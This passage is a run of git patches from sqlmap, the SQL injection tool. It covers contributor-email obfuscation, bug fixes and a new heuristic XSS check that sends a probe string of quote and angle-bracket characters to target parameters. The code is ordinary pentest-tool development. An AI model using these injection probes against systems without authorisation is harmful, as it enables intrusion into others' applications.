-Brian Shura, <bshura@appsecconsulting.com>
+Brian Shura, <bshura(at)appsecconsulting.com>
 * for reporting a bug
 
-Sumit Siddharth, <sid@notsosecure.com>
+Sumit Siddharth, <sid(at)notsosecure.com>
 * for sharing ideas on the implementation of a couple of features
 
-Andre Silva, <andreoaz@gmail.com>
+Andre Silva, <andreoaz(at)gmail.com>
 * for reporting a bug
 
-Benjamin Silva H. <silva96@gmail.com>
+Benjamin Silva H. <silva96(at)gmail.com>
 * for reporting a bug
 
-Duarte Silva <duarte.silva@serializing.me>
+Duarte Silva <duarte.silva(at)serializing.me>
 * for reporting a couple of bugs
 
-M Simkin, <mlsimkin@cox.net>
+M Simkin, <mlsimkin(at)cox.net>
 * for suggesting a feature
 
-Konrads Smelkovs, <konrads@smelkovs.com>
+Konrads Smelkovs, <konrads(at)smelkovs.com>
 * for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
 
-Chris Spencer, <chris.spencer@ngssecure.com>
+Chris Spencer, <chris.spencer(at)ngssecure.com>
 * for reviewing the user's manual grammar
 
-Michael D. Stenner, <mstenner@linux.duke.edu>
+Michael D. Stenner, <mstenner(at)linux.duke.edu>
 * for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
 
-Marek Stiefenhofer, <m.stiefenhofer@r-tec.net>
+Marek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>
 * for reporting a few bugs
 
-Jason Swan, <jasoneswan@gmail.com>
+Jason Swan, <jasoneswan(at)gmail.com>
 * for reporting a bug when enumerating columns on Microsoft SQL Server
 * for suggesting a couple of improvements
 
-Chilik Tamir, <phenoman@gmail.com>
+Chilik Tamir, <phenoman(at)gmail.com>
 * for contributing a patch for initial support SOAP requests
 
-Alessandro Tanasi, <alessandro@tanasi.it>
+Alessandro Tanasi, <alessandro(at)tanasi.it>
 * for extensively beta-testing sqlmap
 * for suggesting many features and reporting some bugs
 * for reviewing the documentation
 
-Andres Tarasco, <atarasco@gmail.com>
+Andres Tarasco, <atarasco(at)gmail.com>
 * for contributing good feedback
 
-Tom Thumb, <k1971@live.co.uk>
+Tom Thumb, <k1971(at)live.co.uk>
 * for reporting a major bug
 
-Kazim Bugra Tombul, <mhackmail@gmail.com>
+Kazim Bugra Tombul, <mhackmail(at)gmail.com>
 * for reporting a minor bug
 
-Efrain Torres, <et@metasploit.com>
+Efrain Torres, <et(at)metasploit.com>
 * for helping me out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
 * for his great Metasploit WMAP Framework
 
-Sandro Tosi, <matrixhasu@gmail.com>
+Sandro Tosi, <matrixhasu(at)gmail.com>
 * for helping to create sqlmap Debian package correctly
 
-Jacco van Tuijl, <jaccovantuijl@gmail.com>
+Jacco van Tuijl, <jaccovantuijl(at)gmail.com>
 * for reporting several bugs
 
-Vitaly Turenko, <dsu@dsu.com.ua>
+Vitaly Turenko, <dsu(at)dsu.com.ua>
 * for reporting a bug
 
-Augusto Urbieta, <x2xpy50@gmail.com>
+Augusto Urbieta, <x2xpy50(at)gmail.com>
 * for reporting a minor bug
 
-Bedirhan Urgun, <bedirhanurgun@gmail.com>
+Bedirhan Urgun, <bedirhanurgun(at)gmail.com>
 * for reporting a few bugs
 * for suggesting some features and improvements
 * for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 
-Kyprianos Vasilopoulos, <kyprianos.vasilopoulos@gmail.com>
+Kyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>
 * for reporting a couple of minor bugs
 
-Vlado Velichkovski, <ketejadam@hotmail.com>
+Vlado Velichkovski, <ketejadam(at)hotmail.com>
 * for reporting considerable amount of bugs
 * for suggesting an enhancement
 
-Johnny Venter, <johnny.venter@zoho.com>
+Johnny Venter, <johnny.venter(at)zoho.com>
 * for reporting a couple of bugs
 
-Carlos Gabriel Vergara, <carlosgabrielvergara@gmail.com>
+Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
 * for suggesting couple of good features
 
-Patrick Webster, <patrick@aushack.com>
+Patrick Webster, <patrick(at)aushack.com>
 * for suggesting an enhancement
 
-Ed Williams, <ed.williams@ngssecure.com>
+Ed Williams, <ed.williams(at)ngssecure.com>
 * for suggesting a minor enhancement
 
-Anthony Zboralski, <anthony.zboralski@bellua.com>
+Anthony Zboralski, <anthony.zboralski(at)bellua.com>
 * for providing with detailed feedback
 * for reporting a few minor bugs
 * for donating to sqlmap development
 
-Thierry Zoller, <thierry@zoller.lu>
+Thierry Zoller, <thierry(at)zoller.lu>
 * for reporting a couple of major bugs
 
-Zhen Zhou, <zhouzhenster@gmail.com>
+Zhen Zhou, <zhouzhenster(at)gmail.com>
 * for suggesting a feature
 
--insane-, <insane_@gmx.de>
+-insane-, <insane_(at)gmx.de>
 * for reporting a minor bug
 
-1ndr4 joe, <c0d3w4st3r@gmail.com>
+1ndr4 joe, <c0d3w4st3r(at)gmail.com>
 * for reporting a couple of bugs
 
-abc abc, <biedimc@gmx.net>
+abc abc, <biedimc(at)gmx.net>
 * for reporting a minor bug
 
-Abuse 007, <abuse007@gmail.com>
+Abuse 007, <abuse007(at)gmail.com>
 * for reporting a bug
 
-Alex, <m3zero@gmail.com>
+Alex, <m3zero(at)gmail.com>
 * for reporting a minor bug
 
-anonymous anonymous, <tmp@2ch.so>
+anonymous anonymous, <tmp(at)2ch.so>
 * for reporting a couple of bugs
 
-bamboo, <roberthacksley@gmail.com>
+bamboo, <roberthacksley(at)gmail.com>
 * for reporting a couple of bugs
 
-Brandon E., <brandonpoc@gmail.com>
+Brandon E., <brandonpoc(at)gmail.com>
 * for reporting a bug
 
-black zero, <timeisflowing@gmail.com>
+black zero, <timeisflowing(at)gmail.com>
 * for reporting a minor bug
 
-blueBoy, <blueboy4444@gmail.com>
+blueBoy, <blueboy4444(at)gmail.com>
 * for reporting a bug
 
-buawig, <buawig@gmail.com>
+buawig, <buawig(at)gmail.com>
 * for reporting considerable amount of bugs
 
-Bugtrace, <bugtrace@gmail.com>
+Bugtrace, <bugtrace(at)gmail.com>
 * for reporting several bugs
 
-cats, <dump@alcor.se>
+cats, <dump(at)alcor.se>
 * for reporting a couple of bugs
 
-Christian S, <christian_s@linuxmail.org>
+Christian S, <christian_s(at)linuxmail.org>
 * for reporting a minor bug
 
-clav, <elclav@gmail.com>
+clav, <elclav(at)gmail.com>
 * for reporting a minor bug
 
-dragoun dash, <dragoun.dash@gmail.com>
+dragoun dash, <dragoun.dash(at)gmail.com>
 * for reporting a minor bug
 
-fufuh, <fufuh@users.sourceforge.net>
+fufuh, <fufuh(at)users.sourceforge.net>
 * for reporting a bug when running on Windows
 
-Hans Wurst, <wurstwass0r@googlemail.com>
+Hans Wurst, <wurstwass0r(at)googlemail.com>
 * for reporting a couple of bugs
 
-james, <james@ev6.net>
+james, <james(at)ev6.net>
 * for reporting a bug
 
-Joe "Pragmatk", <pragmatk@gmail.com>
+Joe "Pragmatk", <pragmatk(at)gmail.com>
 * for reporting a few bugs
 
-John Smith, <tixos@live.com>
+John Smith, <tixos(at)live.com>
 * for reporting several bugs
 * for suggesting some features
 
-m4l1c3, <malice.anon@gmail.com>
+m4l1c3, <malice.anon(at)gmail.com>
 * for reporting considerable amount of bugs
 
-mariano, <marianoso@gmail.com>
+mariano, <marianoso(at)gmail.com>
 * for reporting a bug
 
-mitchell, <mitchell@tufala.net>
+mitchell, <mitchell(at)tufala.net>
 * for reporting a few bugs
 
-Nadzree, <nadzree@bake180.com>
+Nadzree, <nadzree(at)bake180.com>
 * for reporting a minor bug
 
-nightman, <nightman@email.de>
+nightman, <nightman(at)email.de>
 * for reporting considerable amount of bugs
 
-Oso Dog osodog123@yahoo.com
+Oso Dog osodog123(at)yahoo.com
 * for reporting a minor bug
 
-pacman730, <pacman730@users.sourceforge.net>
+pacman730, <pacman730(at)users.sourceforge.net>
 * for reporting a bug
 
-pentestmonkey, <pentestmonkey@pentestmonkey.net>
+pentestmonkey, <pentestmonkey(at)pentestmonkey.net>
 * for reporting several bugs
 * for suggesting a few minor enhancements
 
-Phat R., <phatthanaphol@gmail.com>
+Phat R., <phatthanaphol(at)gmail.com>
 * for reporting a few bugs
 
-Phil P, <@superevr>
+Phil P, <(at)superevr>
 * for suggesting a minor enhancement
 
-ragos, <ragos@joker.ms>
+ragos, <ragos(at)joker.ms>
 * for reporting a minor bug
 
-rmillet, <rmillet42@gmail.com>
+rmillet, <rmillet42(at)gmail.com>
 * for reporting a bug
 
-Rub3nCT, <rub3nct@gmail.com>
+Rub3nCT, <rub3nct(at)gmail.com>
 * for reporting a minor bug
 
-shiftzwei, <shiftzwei@gmail.com>
+shiftzwei, <shiftzwei(at)gmail.com>
 * for reporting a couple of bugs
 
-smith, <esmyl911@gmail.com>
+smith, <esmyl911(at)gmail.com>
 * for reporting a minor bug
 
-Soma Cruz, <oleg.kupreev@gmail.com>
+Soma Cruz, <oleg.kupreev(at)gmail.com>
 * for reporting a minor bug
 
-Stuffe, <stuffe.dk@gmail.com>
+Stuffe, <stuffe.dk(at)gmail.com>
 * for reporting a minor bug and a feature request
 
-Sylphid, <sylphid.su@sti.com.tw>
+Sylphid, <sylphid.su(at)sti.com.tw>
 * for suggesting some features
 
-syssecurity.info, <syssecurity7@googlemail.com>
+syssecurity.info, <syssecurity7(at)googlemail.com>
 * for reporting a minor bug
 
-This LittlePiggy, <thislittlepiggyhadroastbeef@hotmail.com>
+This LittlePiggy, <thislittlepiggyhadroastbeef(at)hotmail.com>
 * for reporting a minor bug
 
-ToR, <sstidus@email.it>
+ToR, <sstidus(at)email.it>
 * for reporting considerable amount of bugs
 * for suggesting a feature
 
-ultramegaman, <seclists@ultramegaman.com>
+ultramegaman, <seclists(at)ultramegaman.com>
 * for reporting a minor bug
 
-Vinicius, <viniciusmaxdaloop@gmail.com>
+Vinicius, <viniciusmaxdaloop(at)gmail.com>
 * for reporting a minor bug
 
-wanglei, <wanglei@17uxi.cn>
+wanglei, <wanglei(at)17uxi.cn>
 * for reporting a minor bug
 
-warninggp, <warninggp@gmail.com>
+warninggp, <warninggp(at)gmail.com>
 * for reporting a few minor bugs
 
-x, <deep_freeze@mail.ru>
+x, <deep_freeze(at)mail.ru>
 * for reporting a bug
 
-zhouhx, <zhouhx@knownsec.com>
+zhouhx, <zhouhx(at)knownsec.com>
 * for contributing a minor patch
 
 # Organizations
 
-Black Hat team, <info@blackhat.com>
+Black Hat team, <info(at)blackhat.com>
 * for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation
  * Homepage: http://goo.gl/BKfs7
  * Slides: http://goo.gl/Dh65t
  * White paper: http://goo.gl/spX3N
 
-SOURCE Conference team, <press@sourceconference.com>
+SOURCE Conference team, <press(at)sourceconference.com>
 * for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation
  * Homepage: http://goo.gl/IeXV4
  * Slides: http://goo.gl/OKnfj
 
-AthCon Conference team, <cfp@athcon.org>
+AthCon Conference team, <cfp(at)athcon.org>
 * for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation
  * Homepage: http://goo.gl/Fs71I
  * Slides: http://goo.gl/QMfjO
 
-Metasploit Framework development team, <msfdev@metasploit.com>
+Metasploit Framework development team, <msfdev(at)metasploit.com>
 * for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server
  * Homepage: http://www.metasploit.com
 
-OWASP Board, <info@owasp.org>
+OWASP Board, <info(at)owasp.org>
 * for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007
  * Homepage: http://www.owasp.org

From f272517cd24c45dc914b207c28695cfc070dabef Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 22 Sep 2014 22:18:08 +0200
Subject: [PATCH 037/492] Dealing with broken pipe (not filling terminal with
 traceback in that case)

---
 thirdparty/ansistrm/ansistrm.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py
index eb30b9c6d..95d2b00be 100644
--- a/thirdparty/ansistrm/ansistrm.py
+++ b/thirdparty/ansistrm/ansistrm.py
@@ -62,6 +62,8 @@ class ColorizingStreamHandler(logging.StreamHandler):
             self.flush()
         except (KeyboardInterrupt, SystemExit):
             raise
+        except IOError:
+            pass
         except:
             self.handleError(record)
 

From 767c278a0fb74ebe57dd3c99dd2ac697f91f67e9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 26 Sep 2014 17:00:38 +0200
Subject: [PATCH 038/492] Fix for an Issue #838

---
 lib/request/connect.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 2eab46815..32e43eb42 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -385,7 +385,7 @@ class Connect(object):
 
             conn = urllib2.urlopen(req)
 
-            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType.lower() == AUTH_TYPE.BASIC.lower():
+            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
                 kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
 
             if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):

From 1e636fb925a73d92f8b9c48a156c1d5e52df9d9a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 28 Sep 2014 13:38:09 +0200
Subject: [PATCH 039/492] Minor patch regarding Issue #840

---
 lib/request/connect.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 32e43eb42..d0512b8b5 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -768,7 +768,7 @@ class Connect(object):
 
         if conf.evalCode:
             delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
-            variables = {}
+            variables = {"uri": uri}
             originals = {}
 
             for item in filter(None, (get, post if not kb.postHint else None)):
@@ -787,6 +787,7 @@ class Connect(object):
 
             originals.update(variables)
             evaluateCode(conf.evalCode, variables)
+            uri = variables["uri"]
 
             for name, value in variables.items():
                 if name != "__builtins__" and originals.get(name, "") != value:

From ff42720c6257de96cabd0bdb1efef9f256836deb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 29 Sep 2014 14:07:59 +0200
Subject: [PATCH 040/492] Minor fix

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index fa1029a58..fcaacd17e 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1004,7 +1004,7 @@ def _setWafFunctions():
 
             _ = dict(inspect.getmembers(module))
             if "detect" not in _:
-                errMsg = "missing function 'detect(page, headers, code)' "
+                errMsg = "missing function 'detect(get_page)' "
                 errMsg += "in WAF script '%s'" % found
                 raise SqlmapGenericException(errMsg)
             else:

From 4d237444308a68a21355695c31e935132c7f54e4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 30 Sep 2014 09:58:02 +0200
Subject: [PATCH 041/492] Bug fix (there was a problem using --tamper=varnish
 with --identify-waf because of same named modules)

---
 lib/core/option.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/core/option.py b/lib/core/option.py
index fcaacd17e..921fd035e 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -998,6 +998,8 @@ def _setWafFunctions():
                 sys.path.insert(0, dirname)
 
             try:
+                if filename[:-3] in sys.modules:
+                    del sys.modules[filename[:-3]]
                 module = __import__(filename[:-3])
             except ImportError, msg:
                 raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))

From 8c9014c39fb3c21c703d50f1fc57f33d0fa35ea2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 13:31:48 +0200
Subject: [PATCH 042/492] Adding a dummy (auxiliary) XSS check

---
 lib/controller/checks.py | 15 +++++++++++++++
 lib/core/common.py       |  4 ++--
 lib/core/settings.py     |  3 +++
 3 files changed, 20 insertions(+), 2 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index d19a32d31..44582dbc3 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -58,6 +58,7 @@ from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
@@ -848,6 +849,20 @@ def heuristicCheckSqlInjection(place, parameter):
         infoMsg += "not be injectable"
         logger.warn(infoMsg)
 
+    kb.heuristicMode = True
+
+    payload = "%s%s%s" % (prefix, "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()), suffix)
+    payload = agent.payload(place, parameter, newValue=payload)
+    page, _ = Request.queryPage(payload, place, content=True, raise404=False)
+
+    if DUMMY_XSS_CHECK_APPENDIX in (page or ""):
+        infoMsg = "heuristic (XSS) test shows that %s " % place
+        infoMsg += "parameter '%s' might " % parameter
+        infoMsg += "be vulnerable to XSS attacks"
+        logger.info(infoMsg)
+
+    kb.heuristicMode = False
+
     return kb.heuristicTest
 
 def checkDynParam(place, parameter, value):
diff --git a/lib/core/common.py b/lib/core/common.py
index e99dfa63d..2a30103e8 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2931,7 +2931,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
 
     retVal = content
 
-    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism:
+    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
         def _(value):
             while 2 * REFLECTED_REPLACEMENT_REGEX in value:
                 value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
@@ -2966,7 +2966,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
                     regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
                     retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
 
-            if retVal != content and not kb.heuristicMode:
+            if retVal != content:
                 kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
                 if not suppressWarning:
                     warnMsg = "reflective value(s) found and filtering out"
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4a93fdfa5..66bc20418 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -509,6 +509,9 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
 # Alphabet used for heuristic checks
 HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
 
+# String used for dummy XSS check of a tested parameter value
+DUMMY_XSS_CHECK_APPENDIX = "<'\">"
+
 # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
 

From a9454fbb439a7258ed39c6c1bbdd5e2f4222de8a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 13:35:20 +0200
Subject: [PATCH 043/492] Minor commit related to the last one (bypassing DBMS
 error trimming problem)

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 44582dbc3..d875b4b85 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -851,7 +851,7 @@ def heuristicCheckSqlInjection(place, parameter):
 
     kb.heuristicMode = True
 
-    payload = "%s%s%s" % (prefix, "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()), suffix)
+    payload = "%s%s%s" % (prefix, "%s'%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()), suffix)
     payload = agent.payload(place, parameter, newValue=payload)
     page, _ = Request.queryPage(payload, place, content=True, raise404=False)
 

From f67a38dba9223ee99fca2007bf9b969a497a7276 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 13:42:10 +0200
Subject: [PATCH 044/492] Minor adjustment

---
 lib/controller/checks.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index d875b4b85..e4429dfd7 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -851,11 +851,12 @@ def heuristicCheckSqlInjection(place, parameter):
 
     kb.heuristicMode = True
 
-    payload = "%s%s%s" % (prefix, "%s'%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr()), suffix)
+    value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
+    payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
     payload = agent.payload(place, parameter, newValue=payload)
     page, _ = Request.queryPage(payload, place, content=True, raise404=False)
 
-    if DUMMY_XSS_CHECK_APPENDIX in (page or ""):
+    if value in (page or ""):
         infoMsg = "heuristic (XSS) test shows that %s " % place
         infoMsg += "parameter '%s' might " % parameter
         infoMsg += "be vulnerable to XSS attacks"

From e81168af0f75c9779791bae96b77760b87204e45 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 13:59:51 +0200
Subject: [PATCH 045/492] Minor adjustment

---
 lib/techniques/brute/use.py | 10 +++++-----
 lib/techniques/dns/use.py   |  2 +-
 lib/techniques/union/use.py |  2 +-
 3 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py
index 66e565bf1..6a5ea5682 100644
--- a/lib/techniques/brute/use.py
+++ b/lib/techniques/brute/use.py
@@ -116,7 +116,7 @@ def tableExists(tableFile, regex=None):
 
                 if conf.verbose in (1, 2) and not hasattr(conf, "api"):
                     clearConsoleLine(True)
-                    infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
+                    infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(table))
                     dataToStdout(infoMsg, True)
 
             if conf.verbose in (1, 2):
@@ -224,11 +224,11 @@ def columnExists(columnFile, regex=None):
 
                 if conf.verbose in (1, 2) and not hasattr(conf, "api"):
                     clearConsoleLine(True)
-                    infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
+                    infoMsg = "[%s] [INFO] retrieved: %s\n" % (time.strftime("%X"), unsafeSQLIdentificatorNaming(column))
                     dataToStdout(infoMsg, True)
 
             if conf.verbose in (1, 2):
-                status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
+                status = "%d/%d items (%d%%)" % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit))
                 dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True)
 
             kb.locks.io.release()
@@ -257,9 +257,9 @@ def columnExists(columnFile, regex=None):
                 result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column)))
 
             if result:
-                columns[column] = 'numeric'
+                columns[column] = "numeric"
             else:
-                columns[column] = 'non-numeric'
+                columns[column] = "non-numeric"
 
         kb.data.cachedColumns[conf.db] = {conf.tbl: columns}
 
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index ef7280be9..dead67d73 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -98,7 +98,7 @@ def dnsUse(payload, expression):
             retVal = output
 
             if kb.dnsTest is not None:
-                dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
+                dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
 
                 if count > 0:
                     hashDBWrite(expression, output)
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py
index 75e4c4b68..e1a043e70 100644
--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@@ -322,7 +322,7 @@ def unionUse(expression, unpack=True, dump=False):
                                 if len(status) > width:
                                     status = "%s..." % status[:width - 3]
 
-                                dataToStdout("%s\r\n" % status, True)
+                                dataToStdout("%s\n" % status, True)
 
                 runThreads(numThreads, unionThread)
 

From a2b059123a0a9d2431d2d925e7dd2ce7de3addf6 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 14:12:30 +0200
Subject: [PATCH 046/492] Minor update of format exception strings

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 66bc20418..104d28df5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -546,7 +546,7 @@ MAX_HELP_OPTION_LENGTH = 18
 MAX_CONNECT_RETRIES = 100
 
 # Strings for detecting formatting errors
-FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
+FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
 
 # Regular expression used for extracting ASP.NET view state values
 VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'

From fdef53aa679bf8c96f9fb9d4befdf2e36295b7e3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 14:23:45 +0200
Subject: [PATCH 047/492] Minor update of unhandled exception message

---
 lib/core/common.py   | 14 ++++++++------
 lib/core/settings.py |  1 +
 2 files changed, 9 insertions(+), 6 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 2a30103e8..12e4ac9e9 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -98,6 +98,7 @@ from lib.core.settings import ERROR_PARSING_REGEXES
 from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME
 from lib.core.settings import FORM_SEARCH_REGEX
 from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES
+from lib.core.settings import GIT_PAGE
 from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
 from lib.core.settings import HASHDB_MILESTONE_VALUE
 from lib.core.settings import HOST_ALIASES
@@ -2828,13 +2829,14 @@ def unhandledExceptionMessage():
     Returns detailed message about occurred unhandled exception
     """
 
-    errMsg = "unhandled exception in %s, retry your " % VERSION_STRING
-    errMsg += "run with the latest development version from the GitHub "
-    errMsg += "repository. If the exception persists, please send by e-mail "
-    errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE)
-    errMsg += "and any information required to reproduce the bug. The "
+    errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
+    errMsg += "run with the latest development version from official GitHub "
+    errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
+    errMsg += "at '%s' (or less preferably send by e-mail to '%s') " % (ISSUES_PAGE, ML)
+    errMsg += "with the following text and any other information required to "
+    errMsg += "reproduce the bug. The "
     errMsg += "developers will try to reproduce the bug, fix it accordingly "
-    errMsg += "and get back to you.\n"
+    errMsg += "and get back to you\n"
     errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
     errMsg += "Python version: %s\n" % PYVERSION
     errMsg += "Operating system: %s\n" % PLATFORM
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 104d28df5..fbab89ca3 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -26,6 +26,7 @@ DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
 GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
+GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
 ML = "sqlmap-users@lists.sourceforge.net"
 
 # colorful banner

From 45122582cfe89f68d168613e7a16bd01ed570b3c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 1 Oct 2014 14:25:54 +0200
Subject: [PATCH 048/492] Year update in COPYING

---
 doc/COPYING | 2 +-
